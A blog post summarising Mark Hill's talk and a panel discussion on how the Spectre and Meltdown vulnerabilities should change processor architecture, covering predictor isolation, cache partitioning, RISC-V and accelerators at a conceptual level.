I gave an introduction to speculative execution and the vulnerabilities that have come to light this year in my post Spectre/Meltdown & What It Means for Future Design 1 . Yesterday, I covered the first half of the keynote (John Hennessy, Paul Turner, and Job Masters) in Spectre/Meltdown & What It Means for Future Design 2 . Today, I wrap up with Mark Hill and the panel discussion that followed. Mark Hill: Exploiting Modern μ Architectures: Hardware Implications Last of the panelists was Mark Hill. He started with a bit of history: Architecture 0.0: (pre-1964) each computer implementation was new, requiring all software to be rewritten (in assembly language, typically). Architecture 1.0: (1964 on) the timing independent functional behavior of a computer was captured in an ISA (which would be implemented by more than one design such as the pioneering IBM/360 series), and all microprocessors today. Architecture 2.0: what we need next. The flaws in implementation that Spectre and Meltdown have revealed are not bugs, in the sense that all the affected processors are faithfully implementing their ISA correctly. The flaw is in the 50-year old timing-independent definition of Architecture 1.0. Since leaking protected information can't really be "correct", we need to do two things. First, manage micro-architecture problems like we manage crime, not completely fixing it which would be too expensive. Second, we need to define Architecture 2.0 and change the way we do things. Some things to consider at the micro-architectural level: Isolate branch predictors, BTB, TLBs per process and context switch them. Currently, weird as it seems, branch predictors are shared between all processes, meaning that sometimes it gets the guess wrong due to a different process, which is a trivial problem, but also that one process can train the branch predictor to affect another one, which has turned out to be bad. Patition caches among trusted processes (and flush on context switch?) Reduce aliasing such as fully-associative caches (use all the bits) Hardware protection within a single user address space, such as one browser tab treating another as an enemy Undo some speculation where it has minimal performance impact. Is there a "happy knee" where we get good performance and good safety? Mark fears that there is not. There is a potential to bifurcate, and have cores (or modes) that are fast(er) or safe(r), where some speculation is disabled. This is an extension of what is being done for security, where hardware "enclaves" hold the keys, and perhaps the encryption algorithm implementation. This also plays well with dark silicon, where there is no point in just adding more and more identical cores if we can't turn them all on at once. But, as Mark pointed out, this is all very esoteric: I'd be just happy if I could stop my Dad executing downloaded code! Mark's big point is that we need Architecture 2.0 since Architecture 1.0 is now known to be inadequate to protect information. We need to augment Architecture 1.0 with: (Abstraction of) time-visible micro-architecture. Bandwidth of known timing channels. Enforced limits on user software behavior. But he admits that none of this seems good enough yet. Another fact of life is the growing use of specialized accelerators such as GPUs, DSPs, neural net processors, and FPGAs. This can actually reduce the need for speculation since the "main" processor is increasingly just doing housekeeping and not running the CPU-intensive algorithms. However, they have timing channels that may be exploitable too. Nobody seems to have looked too hard yet. Security experts disdain "security by obscurity" in favor of many eyeballs on the code. Only the keys are kept secret. Open source software helps, but even lots of eyeballs on a bad implementation doesn't stop it being bad. Open source hardware is only really getting started, with RISC-V being the most well-known open-source hardware-like thing (it is an ISA, not a hardware implementation, so Architecture 1.0). But as John Hennessy's co-Turing-award honoree, Dave Patterson, said: Most future hardware security ideas will be tried with RISC-V first. Discussion (Note: John is John Hennessy. Jon is Jon Masters). Question : Who should bear the cost? Today, Intel, Red Hat and Google are paying. John: Welcome to an industry where the warranty says nothing is guaranteed to work. We have to change how the industry works. As a community, we have acted for functionality over other properties that might be more important. Bill Gates complained to me back in the days when Word still had some competition that people would make checklists and the users would buy the one with the most checks, not the one that worked best. With a processor the first checkbox is how fast it is, not how secure it is. Until a year ago, nobody would have said that they would trade more security for less performance. To be fair, we never asked that question until now. Mark: We are talking about how to get hardware and software to work in concert, and that will take the next 24 months. Jon: I'm worried about fatigue. If we get 10 of these per week, we will need to decide which ones to fix, and people will get burned out. John: This is important, but users accept much greater security issues. People don't create long passwords, different on every system, and change them every month. Mark: Open source hardware is not a full solution. It is a way to try out security idea and get more eyeballs on it. Paul: There is so much value-add in the fabrication that it is always going to be secret sauce. it is worth too much money. But it is important to have a spec. The specs today don't address any of this. John it is good to have an open implementation. In theory you could have an open implementation of an existing ISA, but I don't see that happening for obvious reasons. But with RISC-V people can try things out. You can have a class and get people to implement Meltdown as a teaching tool. Paul: We need greater isolation but it's a heavy hammer. We need a way to map abstractions at the high level down to abstractions at the low level. Mark the code that is in the sandbox separately from the code running the sandbox. Question : Better late than never for the era of security. ISA 2.0 first principle could be simple: no access without authorization. It is a challenge for us educators to look at non-quantitative aspects like security. John: For sure we need to do a better job, but this is not easy. I'm sure a number of you have worked on cache-coherence protocols, and that is really hard. Now think about verifying that you never leak information from a hardware structure. It will require a new set of tools Mark: I apploud the idea of a simple principle, but that is just what the original architects thought they were doing. John: Don't dwell too much on caches as side-channels. There are tons of others. Question : You guys talked about public clouds and paying extra for exclusivity? Paul: Browsers and cloud providers and operating systems are going to have to find better ways to create more separation. John: The tree has fallen in the forest and anyone can read it. Isn't the problem that we are not broadcasting who can reference the information? Jon: The problem is that modern computers share a lot of stuff: the cache, the branch predictors, and so on. These share across boundaries. Paul: As the user I can control how branches are taken, by training the predictor, but it is impossible for the hardware to know if it was tricked. All it knows is it went down a bad branch. Question : What about accelerators? Today this has all been about the CPU. John: Currently accelerators are single-user mode and we currently clear all the state, so that reduces the surface for attack and the rate at which you suck data out. But if these become more pervasive, we’ll have to work out how to make them shared, and we'll be back to the problem of having boundaries. Jon: We don’t want to build Spectre accelerators, using FPGAs in the cloud to leak more data faster! Paul: Northbridge is no longer a separate chip, and so more and more comes under the title of “the CPU”. John: Randomizing page placement, randomizing lots of other stuff, will reduce the bandwidth, but not to zero. But it’s like crime, a temporary fix for now, but not really managing the problem. On that happy note, the session wrapped up. Sign up for Sunday Brunch, the weekly Breakfast Bytes email.
↧